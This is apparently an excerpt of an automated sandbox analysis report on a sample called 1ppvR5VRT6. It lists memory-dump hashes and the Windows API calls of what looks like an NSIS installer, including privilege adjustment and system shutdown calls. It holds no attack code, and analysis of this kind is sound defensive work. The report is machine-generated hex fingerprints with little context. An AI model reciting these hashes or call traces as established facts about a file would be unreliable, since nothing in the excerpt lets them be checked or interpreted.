                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f8e40a76a5e326d3714f1e09be481cd9fb1fcdf890ec506a1d533e97358be3d4
                              • Instruction ID: de6b0afb8129e80f91d0ebe27542892714497ab6122b7e4e74ae331856d142a0
                              • Opcode Fuzzy Hash: f8e40a76a5e326d3714f1e09be481cd9fb1fcdf890ec506a1d533e97358be3d4
                              • Instruction Fuzzy Hash: AD218C34B00244DFDF25EB74C9656EE77F2AB89350F2805A8D006EB2A0DF3A9D51CB60
                              Memory Dump Source
                              • Source File: 00000009.00000002.101736682145.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_ad000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9a2544f314eef7bac8183472f82b18e6e8395be3f5e7ddf55f66464ccba9ae6
                              • Instruction ID: fddc3fd1d8caa3c285f91d22faabf9d5ed91aa53b72ba3547f97688c1af5ae35
                              • Opcode Fuzzy Hash: a9a2544f314eef7bac8183472f82b18e6e8395be3f5e7ddf55f66464ccba9ae6
                              • Instruction Fuzzy Hash: D1212271604240EFDB24CF64D9C4F26BBA1FB89314F20C56EE84A4B686C336D846CA61
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6621bf12872110dd3fceb7c558c91428763bdbab1608dd9f601472160f4614ee
                              • Instruction ID: 8c06c901bbbefeb0677ac149c8e078fdc74f8f5e00a6bcce0509ba841464ce03
                              • Opcode Fuzzy Hash: 6621bf12872110dd3fceb7c558c91428763bdbab1608dd9f601472160f4614ee
                              • Instruction Fuzzy Hash: BD216530E0471A9BDB19DF64D8505DEF7B2AF89314F20861AE815FB390DB70AC55CB90
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66c23e8e189304e5f7f4c0ef9c76a2a69897a7c7289320d16fc17aa46a8c1a75
                              • Instruction ID: a0b579def7a48d2dea3c0f4f485451a8ca6de958ae9c1a4f96a8511aa98edd27
                              • Opcode Fuzzy Hash: 66c23e8e189304e5f7f4c0ef9c76a2a69897a7c7289320d16fc17aa46a8c1a75
                              • Instruction Fuzzy Hash: 7E214F34B00244DFDF54EB78C9156AE77F6AB89350F240468D406EB2A0DF39DD51CBA1
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 42c217c2f84dbed11e7def808b70684eb26feb344f67b27b9daae3480f2bf09f
                              • Instruction ID: 8647ddfb2472e46ddf31b68a80d95ddb522d4406baa2a0911d9135d8e1325700
                              • Opcode Fuzzy Hash: 42c217c2f84dbed11e7def808b70684eb26feb344f67b27b9daae3480f2bf09f
                              • Instruction Fuzzy Hash: E52105302002045BFB21E738C886B197B62E7DA334F549C25E007DB660DB78EC578B91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d78bcec5b561985aca9e2426e5cb341895b9f7634fca0ee841bdf57fcff82979
                              • Instruction ID: 6fcb075114e911e12445cbba3ee1a54b499a7934d3b54371beb52ff8e6579f10
                              • Opcode Fuzzy Hash: d78bcec5b561985aca9e2426e5cb341895b9f7634fca0ee841bdf57fcff82979
                              • Instruction Fuzzy Hash: A7210934B00204CFDB54EB78C959AAE77F2BB89311F104568E406EB3A0EB3A9D01CB90
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 440ff352d06dc811ac2813c03e97ad23aca6d78976d069720cdafaa04d6880a4
                              • Instruction ID: dbfe9d107bc4304c355b49bc85126e568679829087c39a752922b70265cf62d0
                              • Opcode Fuzzy Hash: 440ff352d06dc811ac2813c03e97ad23aca6d78976d069720cdafaa04d6880a4
                              • Instruction Fuzzy Hash: 86219D35F015198FEB04DB69D95278EB7E7EBC4360F108865E405EB340EB39AD428B90
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc4ebf9abefe3c346facd0f27afb8e7f81b98b65d02b4c2caf20dc86df5b5415
                              • Instruction ID: 6a3b86686c7c6db46564a508d2f7304a8a53623608d980048d63525d3998ed2e
                              • Opcode Fuzzy Hash: dc4ebf9abefe3c346facd0f27afb8e7f81b98b65d02b4c2caf20dc86df5b5415
                              • Instruction Fuzzy Hash: 5D11E330F042044BEF27D6388C5136F3B59AB8A354F204979D006DF282EB29DC528BD1
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f66e9e8c6815b2446bf798860a6fe6c85c0c941582255ccaa90357962f94e630
                              • Instruction ID: a3d80e5a584ce8c7766a20f6b2dfc8999e2756f5e7512498700b7acda9798220
                              • Opcode Fuzzy Hash: f66e9e8c6815b2446bf798860a6fe6c85c0c941582255ccaa90357962f94e630
                              • Instruction Fuzzy Hash: 002137B1C012599FDB10CFAED884ADEFFB4FF49710F10816AE558A7201C374A950CBA5
                              Memory Dump Source
                              • Source File: 00000009.00000002.101736682145.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_ad000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 11a75a44971b4ab969a35851085e68ddfcc4b6836075e7c09613b3eb19bf0b00
                              • Instruction ID: d96a245824fca3413ca4cf4536a65d50c7fb338a407f4d91883f845a97c43f4c
                              • Opcode Fuzzy Hash: 11a75a44971b4ab969a35851085e68ddfcc4b6836075e7c09613b3eb19bf0b00
                              • Instruction Fuzzy Hash: 28217F755083809FCB12CF64D994B11BFB1EB46314F28C5DBD8898F6A6C33A9816CB62
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51a9b4f05602c15e502a981b0680e05f5c682dd9b5942fcddd83f51aa35c1051
                              • Instruction ID: b816a5e6692fb6ebf55f2cd09e57823c64b280cebd826fab88caa0ec87c4c0fa
                              • Opcode Fuzzy Hash: 51a9b4f05602c15e502a981b0680e05f5c682dd9b5942fcddd83f51aa35c1051
                              • Instruction Fuzzy Hash: 3C119E30F001048BEF26EA79CC4176F3799AB8A364F214979E006DF292DF69DC528BD1
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0cf70c720eaf4530825110db01c8e20095c37bc984ebafb0c75f4d0fb5d84195
                              • Instruction ID: 4e4aa4dac07b63f206e8741fa78ae35a6b2ac553208d64ab603516347af1f6ae
                              • Opcode Fuzzy Hash: 0cf70c720eaf4530825110db01c8e20095c37bc984ebafb0c75f4d0fb5d84195
                              • Instruction Fuzzy Hash: 1511C431E042509FCF22DFB88C9519DBFB1AF49355B18046AD406EB241E735D851CB91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5ce5ba57f2e041e038b6b9eea83eb7fce72764477387e7d0efa410199a29e6e6
                              • Instruction ID: 17296730fe15643b72de88ec1de80ccb2c6186b71cac7b3065290f3cb300c044
                              • Opcode Fuzzy Hash: 5ce5ba57f2e041e038b6b9eea83eb7fce72764477387e7d0efa410199a29e6e6
                              • Instruction Fuzzy Hash: 1011A131B101298FDF159A78DC156AFB3ABABC9720F018039D40AE7384EF38DC128B90
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 25ef2d45643c3498073b80972acc609cce2da149275ed84ec21c81efbbb72901
                              • Instruction ID: b0eec072301b012a4a886a7a56de080d46e1216522aab92c6a181db48677b418
                              • Opcode Fuzzy Hash: 25ef2d45643c3498073b80972acc609cce2da149275ed84ec21c81efbbb72901
                              • Instruction Fuzzy Hash: 35114879B102119FDF109FB49D4869E3FA5EB89260F180569F909E3340EB388A42C7D1
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98bfbeb4aae8f1d2bc498ff937515d039ad16db09e0ff5188cc1e3e00ebb5690
                              • Instruction ID: 5c0a9e24d1de586117f1f339a3766dfa38701b0e1a04468e220370d79f63a351
                              • Opcode Fuzzy Hash: 98bfbeb4aae8f1d2bc498ff937515d039ad16db09e0ff5188cc1e3e00ebb5690
                              • Instruction Fuzzy Hash: 7C019E317040611BEB2196BD9810B6AB7E7DBCA720F10843AE10AC7396EB19EC124391
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f9bc159968407f22b88fbd9ad64f45d7403dcaf4b2236165ecab487e9322b6c
                              • Instruction ID: b501b0b88e29b428e1888826e89ba02414c7296e07873af009eb16afcfb1d611
                              • Opcode Fuzzy Hash: 8f9bc159968407f22b88fbd9ad64f45d7403dcaf4b2236165ecab487e9322b6c
                              • Instruction Fuzzy Hash: AD21C2B1D01219AFCB10CF9AD984ADEFFB4FF49710F50816AE518B7200C374A954CBA5
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a50047c8a8263cfea8519a054449cc94333b736b2d078161ca1e3093cb434dc2
                              • Instruction ID: 4fd04f06d6a6b700e1cdd7f57d11d314a2ab57a5d5b0c02429a2f2950328b704
                              • Opcode Fuzzy Hash: a50047c8a8263cfea8519a054449cc94333b736b2d078161ca1e3093cb434dc2
                              • Instruction Fuzzy Hash: 7A01DF35F044910FEB169678852171E6BE2CBCEB61F10886AF00EE7345DA29DD038B91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d77dddd4a45edc17e3b61681f936c61f992d3f85c240968b658cab95b3c6aa1a
                              • Instruction ID: 3b2a67ba88e339bc8dc0d6cb2c553576750790d0a4ab3749c03348008a653a6c
                              • Opcode Fuzzy Hash: d77dddd4a45edc17e3b61681f936c61f992d3f85c240968b658cab95b3c6aa1a
                              • Instruction Fuzzy Hash: B2014431A00254AFCF25EFB9885519EBBF5EB49356B18047AE406E7301EB35D851CB91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c49d9494246b24e154aec9c8bf364eeb59c2f01d6d131a36aa5eeb437a6b096
                              • Instruction ID: c78241e01882e83fb3be8222172ff51c87afd831a2beab0b2e7f83eace47a922
                              • Opcode Fuzzy Hash: 2c49d9494246b24e154aec9c8bf364eeb59c2f01d6d131a36aa5eeb437a6b096
                              • Instruction Fuzzy Hash: A921CFB5D01219AFDB00CF9AE984ADEFFB5FF49710F50826AE918A7200C3746954CFA5
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9496159fa117d64656d1d226b95a82209a1a4026faf9c4a259fa1c4bece7d7f3
                              • Instruction ID: a6d542b975a60ffafa5e5fd515fc0a13a6c247acb1126f790b75b5e3626abcb1
                              • Opcode Fuzzy Hash: 9496159fa117d64656d1d226b95a82209a1a4026faf9c4a259fa1c4bece7d7f3
                              • Instruction Fuzzy Hash: 5F01D432B000164FDF1586B8EC656EF77AB9BC9720F10413ED409E7284EF288D138791
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6221b9dc068ba24904aa45a1ba11679d2d445da248c7cfcb847395250291deab
                              • Instruction ID: 2027aa57fe25e9c0a6f5befbffd5be280439da85481779924b72c5d1560a9a1e
                              • Opcode Fuzzy Hash: 6221b9dc068ba24904aa45a1ba11679d2d445da248c7cfcb847395250291deab
                              • Instruction Fuzzy Hash: E4014B317004255BEB2496ADE815B6FB2DADBC9B20F108839E10AC7345EB69EC124791
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a01972c3e023a16f129d42aa23f8e3cd6a223a8cf13f2528ead0c76ae76c36d4
                              • Instruction ID: 2e842d58b2c7ee0c645148d41a68c3d32bd0e18739a72a0647a5fc325948a65b
                              • Opcode Fuzzy Hash: a01972c3e023a16f129d42aa23f8e3cd6a223a8cf13f2528ead0c76ae76c36d4
                              • Instruction Fuzzy Hash: CF01A935F048914BEB15967C8452B1E72D6CBCDB61F108829F10EE7340EA29EC0247D1
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 17bdc80eba4f13f75427f7562ba627fa82e1a47cc16d8665c8290ee97f7ee04e
                              • Instruction ID: 5ed5269409ae4943c137de9b3d5ec9f2b090527a5572323a91c2ee75390a7a61
                              • Opcode Fuzzy Hash: 17bdc80eba4f13f75427f7562ba627fa82e1a47cc16d8665c8290ee97f7ee04e
                              • Instruction Fuzzy Hash: 6701D831A102088BDB14EF65C945A8FBBA5EF85310F54C564D80C6F396DBB1EE16CBE0
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c36f643314410a77546f8f27156c370ae2694cda27b63d1f9e58e233a25d800
                              • Instruction ID: 7b07cf2f60903960c671a9b2ea61aaaf88f35eb4920b716ef39221683c124fdd
                              • Opcode Fuzzy Hash: 3c36f643314410a77546f8f27156c370ae2694cda27b63d1f9e58e233a25d800
                              • Instruction Fuzzy Hash: 78012671A04250AFCB01EBB88C013AE7BE15F45310F2080AAE408EB282EB35DA52C7D2
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 329102d69d6afd303db681723e0a40b24130dc613726a86cda0581b88e0b3f1f
                              • Instruction ID: d436e62a3a19c3f667046c0461742d978a0e75d0e1da49100d768ffe4c26e6f0
                              • Opcode Fuzzy Hash: 329102d69d6afd303db681723e0a40b24130dc613726a86cda0581b88e0b3f1f
                              • Instruction Fuzzy Hash: D6018134B0095A8FEB14D6BCD852B1A73D6EB89764F108C28F10ED7355EA29EC029781
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c6cd244e1f34a6f52c71bf059fcaf154545a52ef7a45969c2606b3108420dbde
                              • Instruction ID: 20628e1445e6b35d4f74d534114501ceefea59b62fef1705677c520e5c76ea05
                              • Opcode Fuzzy Hash: c6cd244e1f34a6f52c71bf059fcaf154545a52ef7a45969c2606b3108420dbde
                              • Instruction Fuzzy Hash: 6CF0A73AE00698CFEB20A569D41578EB7E9E745374F10487AE909E7340D630E8058781
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 378c5ad9c43129628b54ccc24f44da6c389958f83187e0e90bbafeba86a0fd69
                              • Instruction ID: a9c90b584c7658bfe721eadaa18c3ceacf7369b9945dbc8b6ad14571aa7edc0a
                              • Opcode Fuzzy Hash: 378c5ad9c43129628b54ccc24f44da6c389958f83187e0e90bbafeba86a0fd69
                              • Instruction Fuzzy Hash: 14F0A77AF04702DFAF144964D94215D7FA0EB803A0F1059E1F90093380C775E901C750
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 061e92768629bdf6374f448b6c51e69bc4ab53954cf7d7aaaf79a6360e26189b
                              • Instruction ID: 509378359b6bd9c0881b2342240fea2496924aab05be30ee94becf2d60a2f720
                              • Opcode Fuzzy Hash: 061e92768629bdf6374f448b6c51e69bc4ab53954cf7d7aaaf79a6360e26189b
                              • Instruction Fuzzy Hash: DDF0D434E2411ADFDB14DF94E965BAEBBB2BF88704F604659E406A7290CB741C06DF80
                              APIs
                              • SetErrorMode.KERNEL32 ref: 00403332
                              • GetVersion.KERNEL32 ref: 00403338
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
                              • OleInitialize.OLE32(00000000), ref: 004033AE
                              • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
                              • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
                              • GetModuleHandleA.KERNEL32(00000000,0042A000,00000000,?,00000006,00000008,0000000A), ref: 004033F2
                              • CharNextA.USER32(00000000,0042A000,00000020,?,00000006,00000008,0000000A), ref: 0040341D
                              • GetTempPathA.KERNEL32(00000400,0042B400,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
                              • GetWindowsDirectoryA.KERNEL32(0042B400,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
                              • lstrcatA.KERNEL32(0042B400,\Temp,?,00000006,00000008,0000000A), ref: 00403537
                              • GetTempPathA.KERNEL32(000003FC,0042B400,0042B400,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
                              • lstrcatA.KERNEL32(0042B400,Low,?,00000006,00000008,0000000A), ref: 00403553
                              • SetEnvironmentVariableA.KERNEL32(TEMP,0042B400,0042B400,Low,?,00000006,00000008,0000000A), ref: 00403564
                              • SetEnvironmentVariableA.KERNEL32(TMP,0042B400,?,00000006,00000008,0000000A), ref: 0040356C
                              • DeleteFileA.KERNEL32(0042B000,?,00000006,00000008,0000000A), ref: 00403580
                                • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                • Part of subcall function 004038E9: lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,75A33410), ref: 004039D9
                                • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(004236C0), ref: 004039F7
                                • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403A40
                                • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                • Part of subcall function 004037F7: CloseHandle.KERNEL32(FFFFFFFF,0042B400,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                • Part of subcall function 004037F7: CloseHandle.KERNEL32(FFFFFFFF,0042B400,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                              • ExitProcess.KERNEL32 ref: 0040364F
                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                              • ExitProcess.KERNEL32 ref: 004037F1
                                • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                              • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 3704715180-3941163293
                              • Opcode ID: f873ef8a45b584c720bb88a4428bdce3541239ead945e93ac8a036a0ff26db3b
                              • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                              • Opcode Fuzzy Hash: f873ef8a45b584c720bb88a4428bdce3541239ead945e93ac8a036a0ff26db3b
                              • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                              • GetDlgItem.USER32(?,00000408), ref: 00404B60
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                              • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                              • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                              • DeleteObject.GDI32(00000000), ref: 00404C33
                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                              • ShowWindow.USER32(?,00000005), ref: 00404D8C
                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                              • ImageList_Destroy.COMCTL32(?), ref: 00404F5C
                              • GlobalFree.KERNEL32(?), ref: 00404F6C
                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                              • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                              • ShowWindow.USER32(?,00000000), ref: 0040510B
                              • GetDlgItem.USER32(?,000003FE), ref: 00405116
                              • ShowWindow.USER32(00000000), ref: 0040511D
                              Strings
                              Memory Dump Source
